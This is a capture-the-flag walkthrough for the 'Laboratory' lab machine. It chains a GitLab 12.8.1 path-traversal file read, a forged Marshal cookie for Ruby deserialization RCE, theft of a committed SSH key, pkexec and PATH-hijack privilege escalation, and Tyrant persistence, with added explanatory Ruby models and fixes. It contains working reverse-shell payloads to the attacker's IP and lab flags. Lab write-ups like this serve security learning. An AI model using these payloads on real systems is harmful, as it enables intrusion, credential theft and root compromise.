[Meachines] [Easy] Laboratory: GitLab v12.8.1 LFI + Ruby deserialization RCE + lateral movement + TRP00F privilege escalation + PATH hijacking
Word count 1304 | 2025-08-29 08:30:30
GitLab v12.8.1 penetration-testing walkthrough
1. Information gathering
1.1 Target identification
- Target IP: 10.10.10.216
- Open ports:
- 22 (SSH)
- 80 (HTTP)
- 443 (HTTPS)
1.2 Host discovery and port scanning
Scan with the following commands:
ip='10.10.10.216'; itf='tun0'
# Liveness check. -sn alone sends discovery probes; adding -Pn would skip them and always print "Host is up", making the check meaningless.
if nmap -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
# Fast full TCP+UDP sweep with masscan, then collect the open port numbers as a comma-separated list
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
# Version detection and default scripts only on the ports masscan found
nmap -Pn -sV -sC -p "$ports" "$ip"
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
fi
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
1.3 Service identification
- SSH: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
- HTTP: Apache httpd 2.4.41
- HTTPS: Apache httpd 2.4.41 with an SSL certificate
- Certificate details:
- CommonName: laboratory.htb
- Subject Alternative Name: DNS:git.laboratory.htb
- Validity: 2020-07-05 to 2024-03-03
2. Initial access
2.1 Add hosts entries
The SAN in the certificate reveals the second virtual host. Writing to /etc/hosts needs root, and a plain `>>` redirection runs as the unprivileged user, so use tee:
echo '10.10.10.216 laboratory.htb git.laboratory.htb' | sudo tee -a /etc/hosts
2.2 Browse the web services
- Main site: https://laboratory.htb/
- GitLab: https://git.laboratory.htb/users/sign_in
2.3 Register a user
The GitLab instance allows self-registration: create a new account on the sign-in page and log in.
3. Exploiting the GitLab v12.8.1 LFI
3.1 Create projects
- Create two projects, A and B
- In project A, open an issue containing the following:
- Move that issue to project B
3.2 How the vulnerability works
GitLab 12.8.1 (CVE-2020-10977) does not sanitise the file path of upload references (`/uploads/<secret>/<filename>`) in an issue body when the issue is moved to another project. Moving the issue copies every referenced upload into the destination project, and a filename containing `../` segments walks out of the uploads directory, so an arbitrary server file is copied into the new project and can be downloaded: local file inclusion (LFI). This is what is used to read configuration files from the target, including the Rails secret needed in section 4.
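The following is an added example, not GitLab's code: a simplified Ruby model of the "rewrite uploads on issue move" step. It scans a constructed issue body (SAMPLE_ISSUE, UPLOAD_BASE, SECRET and all function names are my own) for upload references, shows that a resolver which trusts the filename lands on /etc/passwd, and shows the containment check that a hardened resolver applies before copying.

```ruby
# Added example: simplified model of the upload-rewrite logic, not GitLab code.
# An issue body references attachments as /uploads/<32-hex-secret>/<filename>;
# when the issue is moved, each referenced file is copied into the target project.
UPLOAD_REF = %r{/uploads/(?<secret>[0-9a-f]{32})/(?<name>[^)\s]+)}

# All (secret, filename) pairs referenced in the markdown.
def referenced_uploads(markdown)
  markdown.scan(UPLOAD_REF) # => [[secret, name], ...]
end

# Vulnerable resolver: trusts the filename taken from the markdown. "../"
# segments walk out of the uploads tree, so the copy step reads any file
# the GitLab service user can open.
def resolve_upload_vulnerable(base, secret, name)
  File.expand_path(File.join(base, secret, name))
end

# Hardened resolver: canonicalise first, then refuse anything outside +base+.
def resolve_upload_safe(base, secret, name)
  base = File.expand_path(base)
  path = File.expand_path(File.join(base, secret, name))
  path.start_with?(base + File::SEPARATOR) ? path : nil
end

# What the move would copy, with the chosen resolver.
def files_to_copy(markdown, base, safe: true)
  referenced_uploads(markdown).filter_map do |secret, name|
    safe ? resolve_upload_safe(base, secret, name) : resolve_upload_vulnerable(base, secret, name)
  end
end

# Constructed sample (not taken from the target): one real attachment and one
# traversal reference of the kind that triggers the 12.8.1 bug.
UPLOAD_BASE = "/var/opt/gitlab/gitlab-rails/uploads/dexter/projecta"
SECRET = "11111111111111111111111111111111"
SAMPLE_ISSUE = <<~MD
  ![screenshot](/uploads/#{SECRET}/screenshot.png)
  ![a](/uploads/#{SECRET}/../../../../../../../../../../etc/passwd)
MD

if $PROGRAM_NAME == __FILE__
  puts "vulnerable copies: #{files_to_copy(SAMPLE_ISSUE, UPLOAD_BASE, safe: false)}"
  puts "hardened copies:   #{files_to_copy(SAMPLE_ISSUE, UPLOAD_BASE)}"
end
```

The fix is the containment check, not a blacklist of `..`: canonicalise the joined path and require it to stay under the uploads base, because encoded or mixed separators can slip past a string filter but not past a resolved path.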
4. Ruby deserialization RCE
4.1 Set up a local GitLab of the same version
Rails verifies the HMAC on a signed cookie before it deserializes the value, so the payload must be signed with the target's secret_key_base. A local GitLab 12.8.1 is installed and configured with the target's secret (read from its secrets.yml through the LFI in section 3) before the cookie is generated:
wget https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/xenial/gitlab-ce_12.8.1-ce.0_amd64.deb
sudo dpkg -i gitlab-ce_12.8.1-ce.0_amd64.deb
sudo gitlab-ctl reconfigure
sudo gitlab-ctl restart
4.2 Generate the malicious cookie
gitlab-rails console
# Build a request whose cookie jar serializes with Marshal (the format GitLab 12.8 still deserializes for this cookie)
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
# ERB template whose rendering shells out (note the backticks); the reverse shell goes to the attacker's listener
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.16.31/10032 0>&1'` %>")
# Proxy that calls erb.result the first time the deserialized object is used
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies = request.cookie_jar
cookies.signed[:cookie] = depr   # Marshal.dump, Base64, then HMAC with this instance's secret_key_base
puts cookies[:cookie]
4.3 Trigger the RCE
Start a listener on the attacker machine first (nc -lvnp 10032), then send the printed value as the experimentation_subject_id cookie, which GitLab 12.8 reads as a Marshal-serialized signed cookie:
curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=<cookie value printed by the console>--8fdb57c5b65cef79b38c842cc0a42570ff756636"
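To make the chain in 4.2 and 4.3 concrete, here is an added, self-contained Ruby example (not code from the page, GitLab or Rails). TemplateStandIn and ProxyStandIn are my own minimal stand-ins for ERB and ActiveSupport's DeprecatedInstanceVariableProxy, keeping only the behaviour the gadget relies on; the cookie helpers reproduce Rails' default signed-cookie format as I understand the Rails 5/6 defaults (PBKDF2-HMAC-SHA1 key derivation with the "signed cookie" salt, Base64 of Marshal.dump, `--`, HMAC-SHA1 hex). The secret "target-secret-key-base" is a placeholder.

```ruby
require "openssl"

# Stand-in for ERB (added example). ERB#result is essentially eval of the
# compiled template source; that is all the gadget needs.
class TemplateStandIn
  def initialize(src)
    @src = src
  end

  def result
    eval(@src) # arbitrary Ruby runs here, exactly where ERB#result evaluates the template
  end
end

# Stand-in for ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy: every
# method call is forwarded to the *return value* of @instance.@method. The real
# proxy undefines almost all of Object's methods so that even string coercion
# ends up in method_missing; undefining to_s/inspect is enough to show that.
class ProxyStandIn
  undef_method :to_s, :inspect

  def initialize(instance, method)
    @instance = instance
    @method = method
  end

  def method_missing(name, *args, &block)
    @instance.__send__(@method).__send__(name, *args, &block)
  end
end

def build_gadget(ruby_src)
  ProxyStandIn.new(TemplateStandIn.new(ruby_src), :result)
end

SIGNED_COOKIE_SALT = "signed cookie" # Rails' default signed_cookie_salt

# ActiveSupport::KeyGenerator defaults as I understand them: 1000 iterations, 64-byte key.
def signing_key(secret_key_base)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, SIGNED_COOKIE_SALT, 1000, 64)
end

# Attacker side (what cookies.signed[:cookie] = depr produces): base64(Marshal.dump) + "--" + HMAC.
def sign_cookie(obj, secret_key_base)
  data = [Marshal.dump(obj)].pack("m0")
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', signing_key(secret_key_base), data)}"
end

def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side: verify the HMAC, then Marshal.load. A cookie signed with any other
# secret_key_base is rejected before deserialization, which is why the attacker
# needs the target's secret and why the LFI in section 3 matters.
def verify_cookie(cookie, secret_key_base)
  data, digest = cookie.split("--", 2)
  return nil unless data && digest
  expected = OpenSSL::HMAC.hexdigest("SHA1", signing_key(secret_key_base), data)
  return nil unless secure_equal?(digest, expected)
  Marshal.load(data.unpack1("m0"))
end

# End to end: forge with the target's secret, let the "server" verify and load,
# and observe that the first use of the value (here to_s) evaluates the template.
def demo(secret_key_base = "target-secret-key-base")
  cookie = sign_cookie(build_gadget("RUBY_VERSION"), secret_key_base)
  loaded = verify_cookie(cookie, secret_key_base)
  loaded.to_s # method_missing -> TemplateStandIn#result -> eval
end

puts demo if $PROGRAM_NAME == __FILE__
```

Two things follow from the model. The signature is the only gate in front of Marshal.load, so leaking secret_key_base is equivalent to code execution wherever a Marshal-serialized cookie is read; and the payload does nothing at load time, it fires on the first method call against the deserialized value, which is why any page that touches the cookie triggers it.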
5. Lateral movement
5.1 Promote the registered account to admin
The shell from section 4 runs as the GitLab service user (git) inside the GitLab container, so it can open the Rails console on the target:
gitlab-rails console
# Enumerate existing accounts
users = User.all
users.each do |user|
puts "ID: #{user.id}, Username: #{user.username}, Email: #{user.email}, Encrypted Password: #{user.encrypted_password}"
end
# 'map' is the account registered in 2.3; make it an administrator
user = User.find_by(username: 'map')
user.admin = true
user.save!
5.2 Access sensitive data
- As admin, browse every project, including private ones: https://git.laboratory.htb/explore
- An SSH private key is committed to the securedocker project: https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa
- Save it, restrict its permissions, and log in as dexter:
chmod 600 id_rsa; ssh -i id_rsa dexter@laboratory.htb
5.3 user flag
9c2a8cd5962ffcbf1f56cd3ec5e6fde8
6. Privilege escalation (TRP00F)
6.1 Run TRP00F
python3 trp00f.py --lhost 10.10.16.25 --lport 10000 --rhost 10.10.16.25 --rport 10032 --http 9999
When prompted, choose the pkexec exploit (y).
6.2 PATH hijacking
- Pull the SUID root binary /usr/local/bin/docker-security back to the attacker for analysis (attacker side first: nc -lvnp 10011 > docker-security):
nc 10.10.16.31 10011 </usr/local/bin/docker-security
The binary calls chmod by bare name rather than by absolute path, so whichever chmod appears first on PATH runs with its privileges.
- Create a malicious chmod and make it executable using the real chmod by absolute path (echo without -e writes a literal \n, so use printf):
printf '#!/bin/bash\n/bin/bash\n' > /tmp/chmod
/usr/bin/chmod +x /tmp/chmod
export PATH=/tmp:$PATH
- Run /usr/local/bin/docker-security; it resolves chmod to /tmp/chmod and spawns the shell
6.3 Persistence with Tyrant
- Upload the Tyrant binary to /tmp on the target
- Point the hijacked chmod at it (the script has no shebang; /bin/sh's fallback interprets it as a shell script) and run the SUID binary again:
echo '/tmp/tyrant'>/tmp/chmod
/usr/bin/chmod +x /tmp/chmod
/usr/bin/chmod +x /tmp/tyrant
export PATH=/tmp:$PATH
/usr/local/bin/docker-security
- Get a root shell (listener on the attacker side at port 4451):
./tyrant -uid 0 -rhost 10.10.16.31 -rport 4451
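The mechanism used in 6.2 and 6.3, as an added Ruby example that is not from the page or from the Laboratory box. It has two parts: a tiny strings(1)-style scan that flags command strings invoking a tool by bare name (how you spot the weak call in a binary such as docker-security; SAMPLE_BINARY is a constructed byte string, not the real file), and a scratch-directory reproduction of the hijack in which the fake chmod only drops a marker file instead of spawning a shell. SHELL_TOOLS and all function names are my own.

```ruby
require "tmpdir"
require "fileutils"

# Minimal strings(1): printable runs of at least +min+ bytes.
def printable_strings(bytes, min = 4)
  bytes.scan(/[\x20-\x7e]{#{min},}/n)
end

# Tools a set-uid helper commonly shells out to. A string whose first word is one
# of these with no leading slash is a PATH-hijack candidate.
SHELL_TOOLS = %w[chmod chown cp mv rm cat sh bash docker systemctl].freeze

def bare_command_strings(bytes)
  printable_strings(bytes).select do |s|
    SHELL_TOOLS.include?(s.split(/\s+/, 2).first)
  end
end

# Constructed stand-in for a helper binary's bytes (not the real docker-security):
# one bare "chmod" call, one absolute-path call, and compiler noise.
SAMPLE_BINARY = "\x7fELF\x02\x01\x01\x00chmod 700 /tmp/x\x00/usr/bin/docker ps\x00GCC: (Ubuntu 9.3.0) 9.3.0\x00".b

# Reproduces the hijack. Returns which calling convention ran the fake chmod.
def path_hijack_demo
  original_path = ENV["PATH"]
  Dir.mktmpdir("hijack") do |dir|
    fake_bin = File.join(dir, "bin")
    FileUtils.mkdir_p(fake_bin)
    marker = File.join(dir, "hijacked")
    fake_chmod = File.join(fake_bin, "chmod")
    File.write(fake_chmod, "#!/bin/sh\n: > '#{marker}'\n") # stands in for /bin/bash in the walkthrough
    File.chmod(0o755, fake_chmod)
    target = File.join(dir, "target")
    File.write(target, "")

    ENV["PATH"] = "#{fake_bin}:#{original_path}" # the attacker's export PATH=/tmp:$PATH

    # Vulnerable: a single command string goes through /bin/sh, which resolves
    # "chmod" via PATH (what system("chmod 700 ...") in a C helper does).
    system("chmod 700 #{target}")
    vulnerable_hit = File.exist?(marker)
    FileUtils.rm_f(marker)

    # Hardened: absolute path in argv form, so neither the shell nor PATH is consulted.
    real_chmod = %w[/bin/chmod /usr/bin/chmod].find { |p| File.executable?(p) }
    system(real_chmod, "700", target)
    hardened_hit = File.exist?(marker)

    { vulnerable: vulnerable_hit, hardened: hardened_hit }
  end
ensure
  ENV["PATH"] = original_path if original_path
end

if $PROGRAM_NAME == __FILE__
  p bare_command_strings(SAMPLE_BINARY)
  p path_hijack_demo
end
```

For a real set-uid helper the fix is the absolute path (or resetting PATH to a fixed value before any system() call); with the page's payload the hijacked call runs /bin/bash with the helper's privileges, which is the root shell in 6.2.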
6.4 root flag
07456541386c4c220bac22b424b00f3b
7. Key takeaways
- LFI exploitation:
  - GitLab 12.8.1 mishandles upload paths referenced in issue bodies
  - Moving the issue to another project triggers the file copy and therefore the read
- Ruby deserialization RCE:
  - Gadget built from an ActionDispatch::Request cookie jar and ActiveSupport::Deprecation's DeprecatedInstanceVariableProxy wrapped around an ERB template
  - Delivered as a signed, Marshal-serialized cookie; the first use of the deserialized value runs the template
- Lateral movement:
  - Promote the registered user to admin through the GitLab Rails console
  - Browse internal projects to recover the committed SSH private key
- Privilege escalation:
  - TRP00F exploiting pkexec
  - PATH hijacking of a bare chmod call made by a SUID root binary
  - Tyrant for persistent root access
- Defense evasion:
  - Abusing the PATH environment variable
  - Executing malicious code through a legitimate binary